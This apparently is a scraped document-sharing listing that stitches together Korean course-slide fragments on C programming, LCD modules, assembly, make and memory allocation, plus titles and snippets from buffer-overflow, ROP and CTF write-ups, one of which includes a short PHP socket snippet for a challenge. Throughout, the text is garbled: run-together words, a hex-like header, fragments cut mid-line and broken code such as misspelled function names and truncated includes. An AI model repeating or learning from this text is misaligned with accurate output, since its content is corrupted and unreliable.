<4D F736F F F696E74202D20B8B6C0CCC5A9B7CEC7C1B7CEBCBCBCAD202839C1D6C2F7207E203135C1D6C2F > 10주차 문자 LCD 의인터페이스회로및구동함수 Next-Generation Networks Lab. 5. 16x2 CLCD 모듈 (HY-1602H-803) 그림 11-18 19 핀설명표 11-11 번호 분류 핀이름 레벨 (V) 기능 1 V SS or GND 0 GND 전원 2 V Power DD or V CC +5 CLCD 구동전원 3 V 0 - CLCD 명암조절

More information

歯9장.PDF

歯9장.PDF 9 Hello!! C printf() scanf() getchar() putchar() gets() puts() fopen() fclose() fprintf() fscant() fgetc() fputs() fgets() gputs() fread() fwrite() fseek() ftell() I/O 2 (stream) C (text stream) : `/n'

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Chapter 10 포인터 01 포인터의기본 02 인자전달방법 03 포인터와배열 04 포인터와문자열 변수의주소를저장하는포인터에대해알아본다. 함수의인자를값과주소로전달하는방법을알아본다. 포인터와배열의관계를알아본다. 포인터와문자열의관계를알아본다. 1.1 포인터선언 포인터선언방법 자료형 * 변수명 ; int * ptr; * 연산자가하나이면 1 차원포인터 1 차원포인터는일반변수의주소를값으로가짐

More information

untitled

untitled while do-while for break continue while( ) ; #include 0 i int main(void) int meter; int i = 0; while(i < 3) meter = i * 1609; printf("%d %d \n", i, meter); i++; return 0; i i< 3 () 0 (1)

More information

61 62 63 64 234 235 p r i n t f ( % 5 d :, i+1); g e t s ( s t u d e n t _ n a m e [ i ] ) ; if (student_name[i][0] == \ 0 ) i = MAX; p r i n t f (\ n :\ n ); 6 1 for (i = 0; student_name[i][0]!= \ 0&&

More information

No Slide Title

No Slide Title Copyright, 2017 Multimedia Lab., UOS 시스템프로그래밍 (Assembly Code and Calling Convention) Seong Jong Choi chois@uos.ac.kr Multimedia Lab. Dept. of Electrical and Computer Eng. University of Seoul Seoul, Korea

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Development Environment 2 Jo, Heeseung make make Definition make is utility to maintain groups of programs Object If some file is modified, make detects it and update files related with modified one It

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 DEVELOPMENT ENVIRONMENT 2 MAKE Jo, Heeseung MAKE Definition make is utility to maintain groups of programs Object If some file is modified, make detects it and update files related with modified one 2

More information

BOF Foundation.doc

BOF Foundation.doc 해커지망자들이알아야할 Buffer Overflow Attack 의기초 What every applicant for the hacker should know about the foundation of buffer overflow attacks By 달고나 (Dalgona@wowhacker.org) Email: zinwon@gmail.com 2005 년 9월 5일

More information

Microsoft PowerPoint - [2009] 02.pptx

Microsoft PowerPoint - [2009] 02.pptx 원시데이터유형과연산 원시데이터유형과연산 원시데이터유형과연산 숫자데이터유형 - 숫자데이터유형 원시데이터유형과연산 표준입출력함수 - printf 문 가장기본적인출력함수. (stdio.h) 문법 ) printf( Test printf. a = %d \n, a); printf( %d, %f, %c \n, a, b, c); #include #include

More information

슬라이드 1

슬라이드 1 -Part3- 제 4 장동적메모리할당과가변인 자 학습목차 4.1 동적메모리할당 4.1 동적메모리할당 4.1 동적메모리할당 배울내용 1 프로세스의메모리공간 2 동적메모리할당의필요성 4.1 동적메모리할당 (1/6) 프로세스의메모리구조 코드영역 : 프로그램실행코드, 함수들이저장되는영역 스택영역 : 매개변수, 지역변수, 중괄호 ( 블록 ) 내부에정의된변수들이저장되는영역

More information

4. #include <stdio.h> #include <stdlib.h> int main() { functiona(); } void functiona() { printf("hihi\n"); } warning: conflicting types for functiona

4. #include <stdio.h> #include <stdlib.h> int main() { functiona(); } void functiona() { printf(hihi\n); } warning: conflicting types for functiona 이름 : 학번 : A. True or False: 각각항목마다 True 인지 False 인지적으세요. 1. (Python:) randint 함수를사용하려면, random 모듈을 import 해야한다. 2. (Python:) '' (single quote) 는한글자를표현할때, (double quote) 는문자열을표현할때사용한다. B. 다음에러를수정하는방법을적으세요.

More information

Microsoft PowerPoint - ch07 - 포인터 pm0415

Microsoft PowerPoint - ch07 - 포인터 pm0415 2015-1 프로그래밍언어 7. 포인터 (Pointer), 동적메모리할당 2015 년 4 월 4 일 교수김영탁 영남대학교공과대학정보통신공학과 (Tel : +82-53-810-2497; Fax : +82-53-810-4742 http://antl.yu.ac.kr/; E-mail : ytkim@yu.ac.kr) Outline 포인터 (pointer) 란? 간접참조연산자

More information

hlogin7

hlogin7 0x07. Return Oriented Programming ROP? , (DEP, ASLR). ROP (Return Oriented Programming) (excutable memory) rop. plt, got got overwrite RTL RTL Chain DEP, ASLR gadget Basic knowledge plt, got call function

More information

0x00 Contents 0x About Nickster 0x Analaysis 0x Exploit

0x00 Contents 0x About Nickster 0x Analaysis 0x Exploit Defcon CTF 17 th Nickster Report StolenByte(Son Choong-Ho) http://stolenbyte.egloos.com thscndgh_4@hotmail.com WOWHACKER 2009. 08. 09 0x00 Contents 0x01 ------------- About Nickster 0x02 -------------

More information

Microsoft PowerPoint - a6.ppt [호환 모드]

Microsoft PowerPoint - a6.ppt [호환 모드] 이장의내용 6 장조건부처리 부울과비교명령어 조건부점프 조건부루프명령어 조건부구조 컴퓨터정보통신 어셈블리언어 2 6.2 부울과비교명령어 부울명령어 Instructions ti 동작 AND dst, src OR dst, src XOR dst, src NOT dst dst dst AND src dst dst OR src dst dst XOR src dst NOT

More information

0. 표지에이름과학번을적으시오. (6) 1. 변수 x, y 가 integer type 이라가정하고다음빈칸에 x 와 y 의계산결과값을적으시오. (5) x = (3 + 7) * 6; x = 60 x = (12 + 6) / 2 * 3; x = 27 x = 3 * (8 / 4

0. 표지에이름과학번을적으시오. (6) 1. 변수 x, y 가 integer type 이라가정하고다음빈칸에 x 와 y 의계산결과값을적으시오. (5) x = (3 + 7) * 6; x = 60 x = (12 + 6) / 2 * 3; x = 27 x = 3 * (8 / 4 Introduction to software design 2012-1 Final 2012.06.13 16:00-18:00 Student ID: Name: - 1 - 0. 표지에이름과학번을적으시오. (6) 1. 변수 x, y 가 integer type 이라가정하고다음빈칸에 x 와 y 의계산결과값을적으시오. (5) x = (3 + 7) * 6; x = 60 x

More information

$ret = ""; $socket = fsockopen(" ", 8888, $errno, $errstr, 100); fgets( $socket, 50); fgets( $socket, 50); $ret.= fgets( $socket, 50); $

$ret = ; $socket = fsockopen( , 8888, $errno, $errstr, 100); fgets( $socket, 50); fgets( $socket, 50); $ret.= fgets( $socket, 50); $ The 5eX m2n 푼문제 : O O O X O X X O O X O O O O X O X O O O level1 : parse string Level1은 210:207.246.131 이라는 IP와 8888이라는포트번호가주어진다. 접속하여보면, base64로인코딩된스트링을보여주면서, Plain text를전송하라고한다. Base64된스트링을디코드해보면, beistlab

More information

Infinity(∞) Strategy

Infinity(∞) Strategy 배열 (Array) 대용량데이터 대용량데이터를다루는기법 배열 (Array) 포인터 (Pointer) 구조체 (Structure) 파일 (File) 변수 (Variable) 변수및메모리할당 변수선언 : int imsi; imsi 4 Bytes 변수선언 : char imsi2; imsi2 1 Byte 배열 (Array) 배열 동일한데이터형을가지고있는데이터들을처리할때사용

More information

Microsoft PowerPoint - chap13-입출력라이브러리.pptx

Microsoft PowerPoint - chap13-입출력라이브러리.pptx #include int main(void) int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; 1 학습목표 스트림의 기본 개념을 알아보고,

More information

Table Of Contents 1/7 0. Introduction 0-1. Introduction 0-1. Testing Environment 1. Software Vulnerabilty Review 1-1. Buffer OverFlow 1-2. Format Stri

Table Of Contents 1/7 0. Introduction 0-1. Introduction 0-1. Testing Environment 1. Software Vulnerabilty Review 1-1. Buffer OverFlow 1-2. Format Stri Windows System Hacking Technique Author E-Mail Blog Community Company : 조현석 (evernick) : 김언체 (ruina) : evernick@naver.com : ruina_s@naver.com : http://ruinick.tistory.com : http://cafe.naver.com/rekcah

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Network Programming Jo, Heeseung Network 실습 네트워크프로그래밍 멀리떨어져있는호스트들이서로데이터를주고받을수있도록프로그램을구현하는것 파일과는달리데이터를주고받을대상이멀리떨어져있기때문에소프트웨어차원에서호스트들간에연결을해주는장치가필요 이러한기능을해주는장치로소켓이라는인터페이스를많이사용 소켓프로그래밍이란용어와네트워크프로그래밍이랑용어가같은의미로사용

More information

Microsoft Word - ExecutionStack

Microsoft Word - ExecutionStack Lecture 15: LM code from high level language /* Simple Program */ external int get_int(); external void put_int(); int sum; clear_sum() { sum=0; int step=2; main() { register int i; static int count; clear_sum();

More information

=

= written by vangelis(vangelis@wowhacker.org) 0 0000 8 1000 1 0001 9 1001 2 0010 10 1010 3 0011 11 1011 4 0100 12 1100 5 0101 13 1101 6 0110 14 1110 7 0111 15 1111 110112 + 100012 = 1011002 110 0000 0101

More information